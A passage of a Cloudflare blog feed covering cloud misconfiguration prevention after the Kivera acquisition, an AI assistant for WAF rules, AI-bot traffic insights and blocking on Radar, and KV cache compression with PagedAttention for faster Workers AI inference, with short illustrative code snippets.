within cloud environments. 
Drawing boundaries around your cloud resources and tenants ensures that data stays within your organization.</p></li><li><p><b>Improper public access configuration:</b> Incorrectly exposing critical services or storage resources to the internet increases the likelihood of unauthorized access and data compromise. Preventing public access drastically reduces risk.</p></li><li><p><b>Shadow cloud infrastructure:</b> Abandoned or neglected cloud instances are often left vulnerable to exploitation, providing attackers with opportunities to access sensitive data left behind. Preventing untagged or unapproved cloud resources from being created can reduce the risk of exposure.</p></li></ul>
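<p>As a concrete illustration of the “excessive account permissions” risk above, a policy audit can flag wildcard grants before they ship. The sketch below is a minimal, provider-agnostic example; the AWS-style policy shape and the helper name are illustrative, not any vendor’s actual API.</p>

```python
# Sketch: flag IAM-style policy statements that grant wildcard ("*")
# actions or resources -- a common cloud misconfiguration.
# The policy shape mirrors AWS-style JSON policies; the field names are
# illustrative, not tied to a specific provider's API.

def overly_permissive(policy: dict) -> list:
    """Return the Allow statements that grant '*' actions or resources."""
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        if isinstance(actions, str):
            actions = [actions]
        if isinstance(resources, str):
            resources = [resources]
        if "*" in actions or "*" in resources:
            findings.append(stmt)
    return findings

policy = {
    "Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::logs/*"},
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
    ]
}
```

<p>A real scanner would also evaluate conditions, resource scoping, and deny statements, but even this simple check catches the classic “allow everything” misconfiguration.</p>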
    <div>
      <h2>Limitations of existing tools </h2>
      <a href="#limitations-of-existing-tools">
        
      </a>
    </div>
    <p>Many organizations turn to CSPM tools to give them more visibility into cloud misconfigurations. These tools often alert teams after an issue occurs, putting security teams in a reactive mode. Remediation efforts require collaboration between security teams and developers to implement changes, which can be time-consuming and resource-intensive. This approach not only delays issue resolution but also exposes companies to compliance and legal risks, while failing to train employees on secure cloud practices. <a href="https://www.ibm.com/reports/data-breach-action-guide"><u>On average</u></a>, it takes 207 days to identify these breaches and an additional 70 days to contain them. </p><p>Addressing the growing threat of cloud misconfigurations requires proactive security measures and continuous monitoring. Organizations must adopt proactive security solutions that not only detect and alert but also prevent misconfigurations from occurring in the first place and enforce best practices. Creating a first line of defense for cloud deployment errors reduces the volume of alerts for customers, especially those also using CSPM tools or CNAPPs. </p><p>By implementing these proactive strategies, organizations can safeguard their cloud environments against the evolving landscape of cyber threats, ensuring robust security and compliance while minimizing risks and operational disruptions.</p>
    <div>
      <h2>What’s next for Kivera</h2>
      <a href="#whats-next-for-kivera">
        
      </a>
    </div>
    <p>The Kivera product will not be a point solution add-on. We’re making it a core part of our Cloudflare One offering because integrating features from products like our Secure Web Gateway gives customers a comprehensive solution that works better together.</p><p>We’re excited to welcome Kivera to the Cloudflare team. Through the end of 2024 and into early 2025, Kivera’s team will focus on integrating their preventive inline cloud app controls directly into Cloudflare One. We are looking for early access testers and teams to provide feedback about what they would like to see. If you’d like early access, please <a href="https://www.cloudflare.com/lp/cloud-app-controls"><u>join the waitlist</u></a>.</p><p><sub>[1] Source: Outcome-Driven Metrics You Can Use to Evaluate Cloud Security Controls, Gartner, Charlie Winckless, Paul Proctor, Manuel Acosta, 09/28/2023 </sub></p><p><sub>GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.</sub></p><p>
</p> ]]></content:encoded>
            <category><![CDATA[Data Protection]]></category>
            <category><![CDATA[Acquisitions]]></category>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <guid isPermaLink="false">6e7vmGCa8tZRTNJWqYs1di</guid>
            <dc:creator>Noelle Kagan</dc:creator>
            <dc:creator>Neil Brown</dc:creator>
            <dc:creator>Yumna Moazzam</dc:creator>
        </item>
        <item>
            <title><![CDATA[AI Everywhere with the WAF Rule Builder Assistant, Cloudflare Radar AI Insights, and updated AI bot protection]]></title>
            <link>https://blog.cloudflare.com/bringing-ai-to-cloudflare/</link>
            <pubDate>Fri, 27 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ This year for Cloudflare’s birthday, we’ve extended our AI Assistant capabilities to help you build new WAF rules, added new AI bot & crawler traffic insights to Radar, and given customers new AI bot  ]]></description>
            <content:encoded><![CDATA[ <p>The continued growth of AI has fundamentally changed the Internet over the past 24 months. AI is increasingly ubiquitous, and Cloudflare is leaning into the new opportunities and challenges it presents in a big way. This year for Cloudflare’s birthday, we’ve extended our AI Assistant capabilities to help you build new WAF rules, added AI bot traffic insights on Cloudflare Radar, and given customers new <a href="https://www.cloudflare.com/learning/ai/how-to-block-ai-crawlers/">AI bot blocking capabilities</a>.  </p>
    <div>
      <h2>AI Assistant for WAF Rule Builder</h2>
      <a href="#ai-assistant-for-waf-rule-builder">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5RYC4wmCDbs0axY92FfkFk/a728906cb6a902dd1c78ec93a0f650c2/BLOG-2564_1.png" />
          </figure><p>At Cloudflare, we’re always listening to your feedback and striving to make our products as user-friendly and powerful as possible. One area where we've heard your feedback loud and clear is in the complexity of creating custom and rate-limiting rules for our Web Application Firewall (WAF). With this in mind, we’re excited to introduce a new feature that will make rule creation easier and more intuitive: the AI Assistant for WAF Rule Builder. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7avSjubqlfg7L8ymKEztgk/7c3c31e50879ec64bccc384bdfcd5524/BLOG-2564_2.png" />
          </figure><p>By simply entering a natural language prompt, you can generate a custom or rate-limiting rule tailored to your needs. For example, instead of manually configuring a complex rule matching criteria, you can now type something like, "Match requests with low bot score," and the assistant will generate the rule for you. It’s not about creating the perfect rule in one step, but giving you a strong foundation that you can build on. </p><p>The assistant will be available in the Custom and Rate Limit Rule Builder for all WAF users. We’re launching this feature in Beta for all customers, and we encourage you to give it a try. We’re looking forward to hearing your feedback (via the UI itself) as we continue to refine and enhance this tool to meet your needs.</p>
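<p>For a sense of what the assistant produces, a prompt like “Match requests with low bot score” maps to an expression in Cloudflare’s rules language. The payload below is a hedged sketch: <code>cf.bot_management.score</code> and the <code>lt</code> operator are part of the rules language, while the threshold of 30 and the <code>managed_challenge</code> action are illustrative choices, not necessarily what the assistant emits.</p>

```python
# Hedged sketch: the kind of custom-rule definition that the prompt
# "Match requests with low bot score" could generate. The expression uses
# Cloudflare's rules language (cf.bot_management.score is a real field);
# the threshold of 30 and the chosen action are illustrative assumptions.

rule = {
    "description": "Match requests with low bot score",
    "expression": "(cf.bot_management.score lt 30)",
    "action": "managed_challenge",
}
```

<p>The generated rule is a starting point: you can refine the expression in the rule builder before deploying it, just as you would a hand-written rule.</p>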
    <div>
      <h2>AI bot traffic insights on Cloudflare Radar</h2>
      <a href="#ai-bot-traffic-insights-on-cloudflare-radar">
        
      </a>
    </div>
    <p>AI platform providers use bots to crawl and scrape websites, vacuuming up data to use for model training. This is frequently done without the permission of, or a business relationship with, the content owners and providers. In July, Cloudflare urged content owners and providers to <a href="https://blog.cloudflare.com/declaring-your-aindependence-block-ai-bots-scrapers-and-crawlers-with-a-single-click/"><u>“declare their AIndependence”</u></a>, providing them with a way to block AI bots, <a href="https://www.cloudflare.com/learning/ai/how-to-prevent-web-scraping/">scrapers</a>, and crawlers with a single click. In addition to this so-called “easy button” approach, sites can provide more specific guidance to these bots about what they are and are not allowed to access through directives in a <a href="https://www.cloudflare.com/en-gb/learning/bots/what-is-robots-txt/"><u>robots.txt</u></a> file. Regardless of whether a customer chooses to block or allow requests from AI-related bots, Cloudflare has insight into request activity from these bots, and associated traffic trends over time.</p><p>Tracking traffic trends for AI bots can help us better understand their activity over time — which are the most aggressive and have the highest volume of requests, which launch crawls on a regular basis, etc. The new <a href="https://radar.cloudflare.com/traffic#ai-bot-crawler-traffic"><b><u>AI bot &amp; crawler traffic </u></b><u>graph on Radar’s Traffic page</u></a> provides insight into these traffic trends gathered over the selected time period for the top known AI bots. The associated list of bots tracked here is based on the <a href="https://github.com/ai-robots-txt/ai.robots.txt"><u>ai.robots.txt list</u></a>, and will be updated with new bots as they are identified. 
<a href="https://developers.cloudflare.com/api/operations/radar-get-ai-bots-timeseries-group-by-user-agent"><u>Time series</u></a> and <a href="https://developers.cloudflare.com/api/operations/radar-get-ai-bots-summary-by-user-agent"><u>summary</u></a> data is available from the Radar API as well. (Traffic trends for the full set of AI bots &amp; crawlers <a href="https://radar.cloudflare.com/explorer?dataSet=ai.bots"><u>can be viewed in the new Data Explorer</u></a>.)</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5tYefQaBhTPYpqZPtE6KPu/f60694d0b24de2acba13fe0944589885/BLOG-2564_3.png" />
          </figure>
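<p>As a sketch of pulling this data programmatically, the snippet below builds a Radar API request URL. The exact endpoint path is an assumption inferred from the linked API operation names; consult the Radar API reference for the authoritative route and parameters.</p>

```python
# Hedged sketch: build a Radar API request URL for AI bot time series
# data. The endpoint path is an assumption based on the linked API
# operation names; check the Radar API reference for the exact route.
# When fetching, authentication is sent as an
# "Authorization: Bearer <token>" header.
from urllib.parse import urlencode

BASE = "https://api.cloudflare.com/client/v4"

def radar_ai_bots_url(date_range: str = "7d") -> str:
    params = urlencode({"dateRange": date_range, "format": "json"})
    return f"{BASE}/radar/ai/bots/timeseries_groups/user_agent?{params}"
```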
    <div>
      <h2>Blocking more AI bots</h2>
      <a href="#blocking-more-ai-bots">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/UiFu8l6K4Pm3ulxTK3XU0/541d109e29a9ae94e4792fdf94f7e4aa/BLOG-2564_4.png" />
          </figure><p>For Cloudflare’s birthday, we’re following up on our previous blog post, <a href="https://blog.cloudflare.com/declaring-your-aindependence-block-ai-bots-scrapers-and-crawlers-with-a-single-click/"><i><u>Declaring Your AIndependence</u></i></a>, with an update on the new detections we’ve added to stop AI bots. Customers who haven’t already done so can simply <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/bots/configure"><u>click the button</u></a> to block AI bots to gain more protection for their website. </p>
    <div>
      <h3>Enabling dynamic updates for the AI bot rule</h3>
      <a href="#enabling-dynamic-updates-for-the-ai-bot-rule">
        
      </a>
    </div>
    <p>The old button allowed customers to block <i>verified</i> AI crawlers, those that respect robots.txt and crawl rate, and don’t try to hide their behavior. We’ve added new crawlers to that list, but we’ve also expanded the previous rule to include 27 signatures (and counting) of AI bots that <i>don’t</i> follow the rules. We want to say “thank you” to everyone who took the time to use our “<a href="https://docs.google.com/forms/d/14bX0RJH_0w17_cAUiihff5b3WLKzfieDO4upRlo5wj8"><u>tip line</u></a>” to point us towards new AI bots. These tips have been extremely helpful in finding some bots that would not have been on our radar so quickly. </p><p>For each bot we’ve added, we’re also adding it to our “Definitely automated” definition. So, if you’re a self-service plan customer using <a href="https://blog.cloudflare.com/super-bot-fight-mode/"><u>Super Bot Fight Mode</u></a>, you’re already protected. Enterprise Bot Management customers will see more requests shift from the “Likely Bot” range to the “Definitely automated” range, which we’ll discuss more below.</p><p>Under the hood, we’ve converted this rule logic to a <a href="https://developers.cloudflare.com/waf/managed-rules/"><u>Cloudflare managed rule</u></a> (the same framework that powers our WAF). This enables our security analysts and engineers to safely push updates to the rule in real-time, similar to how new WAF rule changes are rapidly delivered to ensure our customers are protected against the latest CVEs. If you haven’t logged back into the Bots dashboard since the previous version of our AI bot protection was announced, click the button again to update to the latest protection. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2tI8Yqxt1S0UPapImb32J4/6cb9e9bf423c370383edb820e5722929/BLOG-2564_5.png" />
          </figure>
    <div>
      <h3>The impact of new fingerprints on the model </h3>
      <a href="#the-impact-of-new-fingerprints-on-the-model">
        
      </a>
    </div>
    <p>One hidden beneficiary of fingerprinting new AI bots is our ML model. <a href="https://blog.cloudflare.com/cloudflare-bot-management-machine-learning-and-more/"><u>As we’ve discussed before</u></a>, our global ML model uses supervised machine learning and greatly benefits from more sources of labeled bot data. Below, you can see how well our ML model recognized these requests as automated, before and after we updated the button, adding new rules. To keep things simple, we have shown only the top 5 bots by the volume of requests on the chart. With the introduction of our new managed rule, we have observed an improvement in our detection capabilities for the majority of these AI bots. Button v1 represents the old option that let customers block only verified AI crawlers, while Button v2 is the newly introduced feature that includes managed rule detections.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2CZVGyDCp9ZtMrZdIi49fE/aacd04d240e9348b5a9b65bad4b470e2/BLOG-2564_6.jpg" />
          </figure><p>So how did we make our detections more robust? As we have mentioned before, sometimes <a href="https://blog.cloudflare.com/cloudflare-bot-management-machine-learning-and-more/"><i><u>a single attribute can give a bot away</u></i></a>. We developed a sophisticated set of heuristics tailored to these AI bots, enabling us to effortlessly and accurately classify them as such. Although our ML model was already detecting the vast majority of these requests, the integration of additional heuristics has resulted in a noticeable increase in detection rates for each bot and ensures we score every request correctly. Transitioning from a purely machine learning approach to incorporating heuristics offers several advantages, including faster detection times and greater certainty in classification. While deploying a machine learning model is complex and time-consuming, new heuristics can be created in minutes. </p><p>The initial launch of the AI bots block button was well-received and is now used by over 133,000 websites, with significant adoption even among our Free tier customers. The newly updated button, launched on August 20, 2024, is rapidly gaining traction. Over 90,000 zones have already adopted the new rule, with approximately 240 new sites integrating it every hour. Overall, we are now helping to protect the intellectual property of more than 146,000 sites from AI bots, and we are currently blocking 66 million requests daily with this new rule. Additionally, we’re excited to announce that support for configuring AI bots protection via Terraform will be available by the end of this year, providing even more flexibility and control for managing your bot protection settings.</p>
    <div>
      <h3>Bot behavior</h3>
      <a href="#bot-behavior">
        
      </a>
    </div>
    <p>With the enhancements to our detection capabilities, it is essential to assess the impact of these changes on bot activity across the Internet. Since the launch of the updated AI bots block button, we have been closely monitoring for any shifts in bot activity and adaptation strategies. The most basic fingerprinting technique we use to identify AI bots is looking for simple user-agent matches. User-agent matches are important to monitor because they indicate the bot is transparently announcing who they are when they’re crawling a website. </p><p>The graph below shows the volume of traffic we label as AI bots over the past two months. The blue line indicates the daily request count, while the red line represents the monthly average number of requests. In the past two months, we have seen an average reduction of nearly 30 million requests, with a decrease of 40 million in the most recent month. This decline coincides with the release of Button v1 and Button v2. Our hypothesis is that with the new AI bots blocking feature, Cloudflare is blocking a majority of these bots, which is discouraging them from crawling. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/23ULxmxBIRskEONlWVIvlA/1dbd3d03239047492c2d4f7307217d97/BLOG-2564_7.jpg" />
          </figure><p>This hypothesis is supported by the observed decline in requests from several top AI crawlers. Specifically, the Bytespider bot reduced its daily requests from approximately 100 million to just 50 million between the end of June and the end of August (see graph below). This reduction could be attributed to several factors, including our new AI bots block button and changes in the crawler's strategy.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5UwtyZSXULrVzIqLcICGKd/fdf02c15d17e1d7ed248ba5f8a97eb54/BLOG-2564_8.jpg" />
          </figure><p>We have also observed an increase in the accountability of some AI crawlers. These crawlers are now more frequently announcing themselves via their user agents, reflecting a shift towards more transparent and responsible behavior. Notably, there has been a dramatic surge in the number of requests from the Perplexity user agent. This increase might be linked to <a href="https://rknight.me/blog/perplexity-ai-is-lying-about-its-user-agent/">previous accusations</a> that Perplexity did not properly present its user agent, which could have prompted a shift in their approach to ensure better identification and compliance. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7Hq2vUMqqdNCyaxNTCg3JD/610ad53d57203203c5176229245c8086/BLOG-2564_9.jpg" />
          </figure><p>These trends suggest that our updates are likely affecting how AI crawlers interact with content. We will continue to monitor AI bot activity to help users control who accesses their content and how. By keeping a close watch on emerging patterns, we aim to provide users with the tools and insights needed to make informed decisions about managing their traffic. </p>
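<p>The user-agent fingerprint discussed above is the simplest of these signals, and can be sketched in a few lines. The signature list here is illustrative only; Cloudflare’s managed rule tracks 27+ signatures, and many detections rely on far more than the declared user agent.</p>

```python
# Minimal sketch of user-agent matching, the most basic fingerprint
# described above. The signature list is illustrative; the actual managed
# rule covers 27+ signatures and is updated as new bots are identified.

AI_BOT_SIGNATURES = ["GPTBot", "Bytespider", "ClaudeBot", "CCBot"]

def is_declared_ai_bot(user_agent: str) -> bool:
    """True if the request transparently announces a known AI bot."""
    ua = user_agent.lower()
    return any(sig.lower() in ua for sig in AI_BOT_SIGNATURES)
```

<p>This only catches bots that announce themselves honestly, which is exactly why such matches are a useful transparency signal rather than a complete defense.</p>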
    <div>
      <h2>Wrap up</h2>
      <a href="#wrap-up">
        
      </a>
    </div>
    <p>We’re excited to continue to explore the AI landscape, whether we’re finding more ways to make the Cloudflare dashboard usable or new threats to guard against. Our AI insights on Radar update in near real-time, so please join us in watching as new trends emerge and discussing them in the <a href="https://community.cloudflare.com/"><u>Cloudflare Community</u></a>. </p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[AI Bots]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Generative AI]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">6HqKUMoXg0wFIQg9howLMX</guid>
            <dc:creator>Adam Martinetti</dc:creator>
            <dc:creator>Harsh Saxena</dc:creator>
            <dc:creator>Gauri Baraskar</dc:creator>
            <dc:creator>Carlos Azevedo</dc:creator>
            <dc:creator>David Belson</dc:creator>
        </item>
        <item>
            <title><![CDATA[Making Workers AI faster and more efficient: Performance optimization with KV cache compression and speculative decoding]]></title>
            <link>https://blog.cloudflare.com/making-workers-ai-faster/</link>
            <pubDate>Thu, 26 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ With a new generation of data center accelerator hardware and using optimization techniques such as KV cache compression and speculative decoding, we’ve made large language model (LLM) ]]></description>
            <content:encoded><![CDATA[ <p>During Birthday Week 2023, <a href="https://blog.cloudflare.com/workers-ai/"><u>we launched Workers AI</u></a>. Since then, we have been listening to your feedback, and one thing we’ve heard consistently is that our customers want Workers AI to be faster. In particular, we hear that large language model (LLM) generation needs to be faster. Users want their interactive chat and agents to go faster, developers want faster help, and users do not want to wait for applications and generated website content to load. Today, we’re announcing three upgrades we’ve made to Workers AI to bring faster and more efficient inference to our customers: upgraded hardware, KV cache compression, and speculative decoding.</p>
    <div>
      <h3>Watch on Cloudflare TV</h3>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p>Thanks to Cloudflare’s <a href="https://blog.cloudflare.com/gen-12-servers/"><u>12th generation compute servers</u></a>, our network now supports a newer generation of GPUs capable of supporting larger models and faster inference. Customers can now use <a href="https://developers.cloudflare.com/workers-ai/models/llama-3.2-11b-vision-instruct"><u>Meta Llama 3.2 11B</u></a>, Meta’s <a href="https://ai.meta.com/blog/llama-3-2-connect-2024-vision-edge-mobile-devices/"><u>newly released</u></a> multi-modal model with vision support, as well as Meta Llama 3.1 70B on Workers AI. Depending on load and time of day, customers can expect to see two to three times the throughput for Llama 3.1 and 3.2 compared to our previous generation Workers AI hardware. More performance information for these models can be found in today’s post: <a href="https://blog.cloudflare.com/workers-ai-bigger-better-faster"><i><u>Cloudflare’s Bigger, Better, Faster AI platform</u></i></a>.</p>
    <div>
      <h2>New KV cache compression methods, now open source</h2>
      <a href="#new-kv-cache-compression-methods-now-open-source">
        
      </a>
    </div>
    <p>In our effort to deliver low-cost low-latency inference to the world, Workers AI has been developing novel methods to boost efficiency of LLM inference. Today, we’re excited to announce a technique for KV cache compression that can help increase throughput of an inference platform. And we’ve made it open source too, so that everyone can benefit from our research.</p>
    <div>
      <h3>It’s all about memory</h3>
      <a href="#its-all-about-memory">
        
      </a>
    </div>
    <p>One of the main bottlenecks when running LLM inference is the amount of vRAM (memory) available. Every token that an LLM processes generates a set of vectors that encode the meaning of that token in the context of the earlier tokens in the input, and those vectors are later queried when generating new tokens. These vectors are stored in the <i>KV cache</i>, causing the memory required for inference to scale linearly with the total number of tokens of all sequences being processed. This makes memory a bottleneck for a lot of transformer-based models. Because of this, the amount of memory an instance has available limits the number of sequences it can generate concurrently, as well as the maximum token length of sequences it can generate.</p>
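<p>A back-of-envelope calculation shows why this scaling bites. The sketch below estimates KV cache size for illustrative, roughly Llama-3.1-8B-like dimensions (32 layers, 8 KV heads under grouped-query attention, head dimension 128, fp16); exact numbers vary by model.</p>

```python
# Back-of-envelope sketch of KV cache size: memory grows linearly with
# the number of tokens in flight. The default dimensions are illustrative
# (roughly Llama-3.1-8B-like with grouped-query attention), fp16 values.

def kv_cache_bytes(tokens: int, layers: int = 32, kv_heads: int = 8,
                   head_dim: int = 128, dtype_bytes: int = 2) -> int:
    # 2x accounts for the key vector plus the value vector stored per
    # token, per KV head, per layer.
    return 2 * layers * kv_heads * head_dim * dtype_bytes * tokens

# A single 8192-token sequence:
mb = kv_cache_bytes(8192) / 2**20
```

<p>At these dimensions a single 8,192-token sequence already consumes about 1 GiB of vRAM for its KV cache alone, before counting weights and activations.</p>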
    <div>
      <h3>So what is the KV cache anyway?</h3>
      <a href="#so-what-is-the-kv-cache-anyway">
        
      </a>
    </div>
    <p>LLMs are made up of layers, with an <a href="https://en.wikipedia.org/wiki/Attention_(machine_learning)"><u>attention</u></a> operation occurring in each layer. Within each layer’s attention operation, information is collected from the representations of all previous tokens that are stored in cache. This means that vectors in the KV cache are organized into layers, so that the active layer’s attention operation can only query vectors from the corresponding layer of KV cache. Furthermore, since attention within each layer is parallelized across multiple attention “heads”, the KV cache vectors of a specific layer are further subdivided into groups corresponding to each attention head of that layer.</p><p>The diagram below shows the structure of an LLM’s KV cache for a single sequence being generated. Each cell represents a KV and the model’s representation for a token consists of all KV vectors for that token across all attention heads and layers. As you can see, the KV cache for a single layer is allocated as an M x N matrix of KV vectors where M is the number of attention heads and N is the sequence length. This will be important later!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ZagFp9yy3E55SR8GKRBvh/9e37f5890165e758ccaebf77464be483/BLOG-2571_2.png" />
          </figure><p>For a deeper look at attention, see the original “<a href="https://arxiv.org/abs/1706.03762"><u>Attention is All You Need</u></a>” paper. </p>
    <div>
      <h3>KV-cache compression — “use it or lose it”</h3>
      <a href="#kv-cache-compression-use-it-or-lose-it">
        
      </a>
    </div>
    <p>Now that we know what the KV cache looks like, let’s dive into how we can shrink it!</p><p>The most common approach to compressing the KV cache involves identifying vectors within it that are unlikely to be queried by future attention operations and can therefore be removed without impacting the model’s outputs. This is commonly done by looking at the past attention weights for each pair of key and value vectors (a measure of the degree with which that KV’s representation has been queried during past attention operations) and selecting the KVs that have received the lowest total attention for eviction. This approach is conceptually similar to a LFU (least frequently used) cache management policy: the less a particular vector is queried, the more likely it is to be evicted in the future.</p>
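<p>A minimal sketch of this eviction policy, with plain Python lists standing in for GPU tensors and the accumulated attention totals given directly:</p>

```python
# Sketch of attention-weight-based eviction as described above: drop the
# KVs with the lowest accumulated attention, per attention head. Plain
# lists stand in for GPU tensors.

def evict_lowest(attn_totals: list, n_evict: int) -> list:
    """Return the indices of KV positions to keep, dropping the n_evict
    positions with the lowest total attention weight."""
    order = sorted(range(len(attn_totals)), key=lambda i: attn_totals[i])
    evicted = set(order[:n_evict])
    return [i for i in range(len(attn_totals)) if i not in evicted]

# One head's accumulated attention over six cached tokens:
keep = evict_lowest([0.9, 0.05, 0.4, 0.01, 0.7, 0.2], n_evict=2)
```

<p>Like an LFU cache, the positions that have been queried least are the first to go.</p>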
    <div>
      <h3>Different attention heads need different compression rates</h3>
      <a href="#different-attention-heads-need-different-compression-rates">
        
      </a>
    </div>
    <p>As we saw earlier, the KV cache for each sequence in a particular layer is allocated on the GPU as a <i># attention heads X sequence length</i> tensor. This means that the total memory allocation scales with the <i>maximum</i> sequence length for all attention heads of the KV cache. Usually this is not a problem, since each sequence generates the same number of KVs per attention head.</p><p>When we consider the problem of eviction-based KV cache compression, however, this forces us to remove an equal number of KVs from each attention head when doing the compression. If we remove more KVs from one attention head alone, those removed KVs won’t actually contribute to lowering the memory footprint of the KV cache on GPU, but will just add more empty “padding” to the corresponding rows of the tensor. You can see this in the diagram below (note the empty cells in the second row below):</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/68Q5hVbfRF1vhqyeGNzB1Q/91056db8208c5e74be00e0add147b3e9/BLOG-2571_3.png" />
          </figure><p>The extra compression along the second head frees slots for two KVs, but the cache’s shape (and memory footprint) remains the same.</p><p>This forces us to use a fixed compression rate for all attention heads of KV cache, which is very limiting on the compression rates we can achieve before compromising performance.</p>
    <div>
      <h3>Enter PagedAttention</h3>
      <a href="#enter-pagedattention">
        
      </a>
    </div>
    <p>The solution to this problem is to change how our KV cache is represented in physical memory. <a href="https://arxiv.org/abs/2309.06180"><u>PagedAttention</u></a> can represent M x N tensors with padding efficiently by using an M x N block table to index into a series of “blocks”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Sia3ZKKzBaHEfI8qLYr8o/57edb68d61ff916d322502aeb406c88c/BLOG-2571_4.png" />
          </figure><p>This lets us retrieve the i<sup>th</sup> element of a row by taking the i<sup>th</sup> block number from that row in the block table and using the block number to lookup the corresponding block, so we avoid allocating space to padding elements in our physical memory representation. In our case, the elements in physical memory are the KV cache vectors, and the <i>M </i>and <i>N</i> that define the shape of our block table are the number of attention heads and sequence length, respectively. Since the block table is only storing integer indices (rather than high-dimensional KV vectors), its memory footprint is negligible in most cases.</p>
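<p>A toy sketch of this indirection: rows of a block table hold integer block ids into a shared pool, so a heavily compressed head simply references fewer blocks rather than carrying padding. The data and names are illustrative, not vLLM’s actual structures.</p>

```python
# Sketch of PagedAttention-style indirection: a block table of integer
# block ids indexes into a flat pool of physical blocks, so a row (head)
# that was compressed harder holds fewer live entries instead of padded
# storage. Strings stand in for blocks of KV vectors.

block_pool = {0: "kv_a", 1: "kv_b", 2: "kv_c", 3: "kv_d", 4: "kv_e"}

# Two attention heads (rows); head 1 was compressed harder, so its row
# references fewer blocks -- no physical padding is allocated for it.
block_table = [
    [0, 1, 2, 3],   # head 0: four live KV blocks
    [4],            # head 1: one live KV block
]

def lookup(head: int, i: int) -> str:
    """Fetch the i-th KV block for a head via the block table."""
    return block_pool[block_table[head][i]]
```

<p>Because the table stores only small integer indices, the memory saved by the extra compression on head 1 is real, not padding.</p>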
    <div>
      <h3>Results</h3>
      <a href="#results">
        
      </a>
    </div>
    <p>Using paged attention lets us apply different rates of compression to different heads in our KV cache, giving our compression strategy more flexibility than other methods. We tested our compression algorithm on <a href="https://arxiv.org/abs/2308.14508"><u>LongBench</u></a> (a collection of long-context LLM benchmarks) with Llama-3.1-8B and found that for most tasks we can retain over 95% task performance while reducing cache size by up to 8x (left figure below). Over 90% task performance can be retained while further compressing up to 64x. That means you have room in memory for 64 times as many tokens!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/pdz5rPhYdfnMmn6cxhczo/29b69bb65aea8989fc1f50283e8ecbc5/BLOG-2571_5.png" />
          </figure><p>This lets us increase the number of requests we can process in parallel, increasing the total throughput (total tokens generated per second) by 3.44x and 5.18x for compression rates of 8x and 64x, respectively (right figure above).</p>
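<p>To get a feel for what these compression rates mean in memory terms, here is some back-of-the-envelope arithmetic. The Llama-3.1-8B shape constants below are our assumptions (a grouped-query-attention layout), not figures from the benchmark; check the model config before relying on them.</p>

```python
# Assumed Llama-3.1-8B shape constants (verify against the model config).
LAYERS = 32      # transformer layers
KV_HEADS = 8     # KV heads per layer under grouped-query attention
HEAD_DIM = 128   # per-head dimension
BYTES = 2        # fp16 element size

# Each token stores one K and one V vector per head, per layer.
bytes_per_token = 2 * LAYERS * KV_HEADS * HEAD_DIM * BYTES

def tokens_that_fit(cache_bytes, compression_rate=1):
    """How many tokens of KV cache fit in a given memory budget."""
    return cache_bytes * compression_rate // bytes_per_token
```

<p>Under these assumptions, a token costs 128 KiB of cache, so a hypothetical 16 GiB budget holds about 131K tokens uncompressed, and 64x compression scales that to roughly 8.4M tokens' worth of slots.</p>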
    <div>
      <h3>Try it yourself!</h3>
      <a href="#try-it-yourself">
        
      </a>
    </div>
    <p>If you’re interested in taking a deeper dive, check out our <a href="https://github.com/IsaacRe/vllm-kvcompress"><u>vLLM fork</u></a> and get compressing!</p>
    <div>
      <h2>Speculative decoding for faster throughput</h2>
      <a href="#speculative-decoding-for-faster-throughput">
        
      </a>
    </div>
